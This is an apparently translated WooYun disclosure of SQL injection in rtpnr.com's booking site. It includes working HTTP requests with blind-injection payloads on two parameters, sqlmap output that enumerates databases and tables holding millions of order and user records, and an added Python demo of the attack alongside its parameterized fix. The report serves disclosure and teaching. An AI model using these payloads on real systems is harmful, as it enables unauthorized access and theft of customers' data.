
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0113316

Title: 中航易购 main site: multiple SQL injection points leak millions of order records

Affected vendor: rtpnr.com

Author: 路人甲

Submitted: 2015-05-11 11:30

Fix time: 2015-06-25 14:12

Published: 2015-06-25 14:12

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-11: Details sent to the vendor; awaiting vendor handling
2015-05-11: Vendor confirmed; details visible to the vendor only
2015-05-21: Details opened to core white hats and domain experts
2015-05-31: Details opened to regular white hats
2015-06-10: Details opened to intern white hats
2015-06-25: Details opened to the public

Brief description:

233

Detailed description:

1. First request (the injectable value is the platformname query-string parameter; the test payloads are listed after the request):
POST /NewEdition/ServeWall/PlateServeWallNew.aspx?0.7027233010157943&platformname=e HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Type=LoadData

Test payloads, sent as the platformname value. The first carries a false condition (3*2=5), the second a true one (3*2=6); the leading e%' and trailing % close and reopen the LIKE '%...%' pattern the parameter is matched with, so the two responses differ only if the input reaches the SQL parser:
e%' AND 3*2=5 AND '000nKtz'!='000nKtz%
e%' AND 3*2=6 AND '000nKtz'!='000nKtz%

2. Second request (the injectable value is the PlatformCode field in the POST body):
POST /NewEdition/ServeWall/PlateServeWallNew.aspx?0.987686010543257 HTTP/1.1
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

PlatformCode=HB'%20AND%203*2*1%3d6%20AND%20'000Jc9s'%3d'000Jc9s&Type=LoadPlatformStar

URL-decoded, the PlatformCode value is: HB' AND 3*2*1=6 AND '000Jc9s'='000Jc9s (a true condition appended to an equality match on 'HB').
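The two injection points above, replayed as an added example that is not part of the original report and not rtpnr.com's code. It splices the report's own payloads into the two query shapes the payloads imply (a LIKE '%...%' search for platformname and an equality match for PlatformCode), runs the boolean-based blind test the reporter used (baseline, true condition, false condition), and then shows the parameterized form that closes both holes. Assumptions: the real backend is Microsoft SQL Server 2008 behind ASP.NET, but an in-memory SQLite database stands in so the script runs offline; the table name, column names and rows are constructed sample data; the false counterpart of the PlatformCode payload is constructed by changing =6 to =5.

```python
"""Boolean-based blind SQL injection: the report's payloads against an
in-memory SQLite stand-in (assumption: real target is MSSQL 2008 / ASP.NET),
plus the parameterized fix. Table, columns and rows are constructed."""
import sqlite3
from urllib.parse import unquote

# Constructed sample rows; nothing here comes from rtpnr.com.
PLATFORMS = [
    ("HB", "Hebei"),
    ("CZ", "Guangzhou"),
    ("MU", "Shanghai"),
    ("SC", "Chengdu"),
]

# Payloads copied from the report. Request 1 targets platformname
# (matched with LIKE '%...%'); request 2 targets PlatformCode (matched with =).
LIKE_BASELINE = "e"
LIKE_FALSE = "e%' AND 3*2=5 AND '000nKtz'!='000nKtz%"
LIKE_TRUE = "e%' AND 3*2=6 AND '000nKtz'!='000nKtz%"
SQLMAP_TRUE = "e%' AND 1645=1645 AND '%'='"          # from the proof section
EQ_BASELINE = "HB"
EQ_TRUE = unquote("HB'%20AND%203*2*1%3d6%20AND%20'000Jc9s'%3d'000Jc9s")
EQ_FALSE = EQ_TRUE.replace("=6", "=5")               # constructed counterpart


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE platform (code TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO platform VALUES (?, ?)", PLATFORMS)
    return conn


def run(conn, sql, params=()):
    """Return the rows, or an error marker when the SQL fails to parse.
    A parse error is itself evidence that input reached the SQL parser."""
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        return ("error", str(exc))


# --- vulnerable pattern: user input concatenated into the SQL text ---------

def search_vulnerable(conn, platformname):
    # LIKE '%<input>%' is why the payload opens with e%' and ends with %
    sql = ("SELECT code, name FROM platform WHERE name LIKE '%"
           + platformname + "%'")
    return run(conn, sql)


def lookup_vulnerable(conn, platform_code):
    sql = "SELECT code, name FROM platform WHERE code = '" + platform_code + "'"
    return run(conn, sql)


# --- fix: parameterized statements; the value can never become SQL --------

def search_safe(conn, platformname):
    return run(conn, "SELECT code, name FROM platform WHERE name LIKE ?",
               ("%" + platformname + "%",))


def lookup_safe(conn, platform_code):
    return run(conn, "SELECT code, name FROM platform WHERE code = ?",
               (platform_code,))


def is_injectable(query, baseline, true_payload, false_payload):
    """The reporter's test: an appended tautology must leave the baseline
    response unchanged and an appended contradiction must change it.
    Requiring both rules out the case where every probe returns nothing."""
    base = query(baseline)
    return query(true_payload) == base and query(false_payload) != base


def demo():
    """Run the blind test against both query shapes, before and after the fix."""
    conn = make_db()
    return {
        "platformname_vulnerable": is_injectable(
            lambda p: search_vulnerable(conn, p), LIKE_BASELINE, LIKE_TRUE, LIKE_FALSE),
        "platformname_safe": is_injectable(
            lambda p: search_safe(conn, p), LIKE_BASELINE, LIKE_TRUE, LIKE_FALSE),
        "PlatformCode_vulnerable": is_injectable(
            lambda p: lookup_vulnerable(conn, p), EQ_BASELINE, EQ_TRUE, EQ_FALSE),
        "PlatformCode_safe": is_injectable(
            lambda p: lookup_safe(conn, p), EQ_BASELINE, EQ_TRUE, EQ_FALSE),
    }


if __name__ == "__main__":
    for name, injectable in demo().items():
        print(f"{name}: {'INJECTABLE' if injectable else 'not injectable'}")
```

The parameterized versions return an empty result for the payload strings because the database now looks for a platform whose name literally contains `e%' AND 3*2=6 ...`; the true and false variants no longer differ, which is exactly what the blind test checks for. On the real stack the same fix is a SqlCommand with SqlParameter values rather than string concatenation in the .aspx code-behind.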

Proof of vulnerability (sqlmap output):

---
Parameter: platformname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: 0.7027233010157943&platformname=e%' AND 1645=1645 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] AutoTicket
[*] BACKUP
[*] distribution
[*] master
[*] model
[*] MonitorBlocking
[*] msdb
[*] Temp2015
[*] tempdb
[*] tslwp
[*] YeeGo_BackUp
[*] YeeGo_History
[*] YeeGo_Order
[*] YeeGoCopy
[*] YeeGoLog
[*] YeeGoTemp
[*] YeeGoUser
[*] YeeSkyBillings
[*] YeeSkyGo_TEST
[*] YeeSkyGoLog_History
[*] Yeesoho_test
[*] YSK_SAAS_History
[*] YSK_SAAS_TEST
Database: AutoTicket
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.T_ReceivingOrder_Log_20150509 | 4828407 |
| dbo.T_ReceivingOrder_Log_20150505 | 4761384 |
| dbo.T_ReceivingOrder_Log_20150506 | 4725686 |
| dbo.T_ReceivingOrder_Log_20150427 | 4679033 |
| dbo.T_ReceivingOrder_Log_20150503 | 4663783 |
| dbo.T_ReceivingOrder_Log_20150501 | 4661247 |
| dbo.T_ReceivingOrder_Log_20150417 | 4615511 |
| dbo.T_ReceivingOrder_Log_20150416 | 4578616 |
| dbo.T_ReceivingOrder_Log_20150423 | 4555551 |
| dbo.T_ReceivingOrder_Log_20150508 | 4537936 |
| dbo.T_ReceivingOrder_Log_20150504 | 4529144 |
| dbo.T_ReceivingOrder_Log_20150502 | 4513908 |
| dbo.T_ReceivingOrder_Log_20150428 | 4458769 |
| dbo.T_ReceivingOrder_Log_20150424 | 4426906 |
| dbo.T_ReceivingOrder_Log_20150430 | 4404906 |
| dbo.T_ReceivingOrder_Log_20150325 | 4386799 |
| dbo.T_ReceivingOrder_Log_20150429 | 4357274 |
| dbo.T_ReceivingOrder_Log_20150421 | 4356534 |
| dbo.T_ReceivingOrder_Log_20150418 | 4344581 |
| dbo.T_ReceivingOrder_Log_20150425 | 4338758 |
| dbo.T_ReceivingOrder_Log_20150419 | 4330283 |
| dbo.T_ReceivingOrder_Log_20150420 | 4322006 |
| dbo.T_ReceivingOrder_Log_20150320 | 4313560 |
| dbo.T_ReceivingOrder_Log_20150319 | 4276456 |
| dbo.T_ReceivingOrder_Log_20150311 | 4275833 |
| dbo.T_ReceivingOrder_Log_20150422 | 4270772 |
| dbo.T_ReceivingOrder_Log_20150426 | 4245304 |
| dbo.T_ReceivingOrder_Log_20141230 | 4209479 |
| dbo.T_ReceivingOrder_Log_20150321 | 4192467 |
| dbo.T_ReceivingOrder_Log_20150415 | 4150012 |
| dbo.T_ReceivingOrder_Log_20150507 | 4137469 |
| dbo.T_ReceivingOrder_Log_20150326 | 4117875 |
| dbo.T_ReceivingOrder_Log_20150324 | 4104741 |
| dbo.T_ReceivingOrder_Log_20150403 | 4084876 |
| dbo.T_ReceivingOrder_Log_20150318 | 4070910 |
| dbo.T_ReceivingOrder_Log_20150414 | 4046374 |
| dbo.T_ReceivingOrder_Log_20141231 | 4036910 |
| dbo.T_ReceivingOrder_Log_20150312 | 4000171 |
| dbo.T_ReceivingOrder_Log_20150402 | 3998813 |
| dbo.T_ReceivingOrder_Log_20150322 | 3946956 |
| dbo.T_ReceivingOrder_Log_20150323 | 3929905 |
| dbo.T_ReceivingOrder_Log_20150327 | 3913425 |
| dbo.T_ReceivingOrder_Log_20150331 | 3906339 |
| dbo.T_ReceivingOrder_Log_20150317 | 3898811 |
| dbo.T_ReceivingOrder_Log_20150409 | 3897456 |
| dbo.T_ReceivingOrder_Log_20150413 | 3888902 |
| dbo.T_ReceivingOrder_Log_20150328 | 3885350 |
| dbo.T_ReceivingOrder_Log_20150408 | 3877437 |
| dbo.T_ReceivingOrder_Log_20150411 | 3821738 |
| dbo.T_ReceivingOrder_Log_20150330 | 3817518 |
| dbo.T_ReceivingOrder_Log_20150313 | 3813373 |
| dbo.T_ReceivingOrder_Log_20150407 | 3801984 |
| dbo.T_ReceivingOrder_Log_20150412 | 3798156 |
| dbo.T_ReceivingOrder_Log_20150401 | 3784647 |
| dbo.T_ReceivingOrder_Log_20141229 | 3770215 |
| dbo.T_ReceivingOrder_Log_20150329 | 3758350 |
| dbo.T_ReceivingOrder_Log_20150314 | 3715299 |
| dbo.T_ReceivingOrder_Log_20150316 | 3709434 |
| dbo.T_ReceivingOrder_Log_20150406 | 3699308 |
| dbo.T_ReceivingOrder_Log_20150404 | 3670486 |
| dbo.T_ReceivingOrder_Log_20150315 | 3621205 |
| dbo.T_ReceivingOrder_Log_20150405 | 3573067 |
| dbo.T_ReceivingOrder_Log_20150410 | 3545505 |
| dbo.T_ReceivingOrder_Log_20150510 | 3265968 |
+-----------------------------------+---------+
Database: YeeGoUser
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| dbo.V_Customer_PlatformInfo | 89126 |
| dbo.T_Application_Platform | 20165 |
| dbo.T_WorkOrder_PlatformApplication | 13600 |
| dbo.VW_CW_CusWorkOrder_YeeGo | 11295 |
| dbo.V_CustomerUserInfo | 8399 |
| dbo.S_CusInfo_SalesManager | 7011 |
| dbo.V_User_Permission | 5584 |
| dbo.VW_YeeGo_UserLogin | 5361 |
| dbo.T_Customer_Application_Account | 4364 |
| dbo.T_Customer_Application_Account | 4364 |
| dbo.V_CusApplyInfo | 4345 |
| dbo.S_CusInfo_ContactPerson | 4292 |
| dbo.S_CusInfo_ContactPerson | 4292 |
| dbo.V_CustomerInfo_ExportUser | 3959 |
| dbo.SC_UserLogin | 3883 |
| dbo.SC_UserBasicData | 3729 |
| dbo.SC_UserBasicData | 3729 |
| dbo.VW_PDAction | 3641 |
| dbo.VW_SC_UserLogin_YeeGo | 3641 |
| dbo.T_CustomerID | 2503 |
| dbo.SC_UserPermission | 2312 |
| dbo.T_PDActiveBak | 1990 |
| dbo.T_PDActiveBak | 1990 |
| dbo.V_CustomerAccount | 1897 |
| dbo.T_WorkOrderRemark | 1573 |
| dbo.T_CustomerFlag_logs | 836 |
| dbo.SC_Role_Permission | 794 |
| dbo.SC_Role_Permission | 794 |
| dbo.SC_Permission | 160 |
| dbo.T_WorkOrder_QuestionType | 12 |
| dbo.T_WorkOrder_ContactType | 10 |
| dbo.V_WorkOrder_ContactType | 10 |
| dbo.V_WorkOrder_ContactType | 10 |
| dbo.T_WorkOrder_ContactPurpose | 9 |
| dbo.T_WorkOrder_ContactPurpose | 9 |
+-------------------------------------+---------+

Fix recommendation:

~~

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-05-11 14:10

Vendor reply:

Thanks for the feedback!

Latest status:

None yet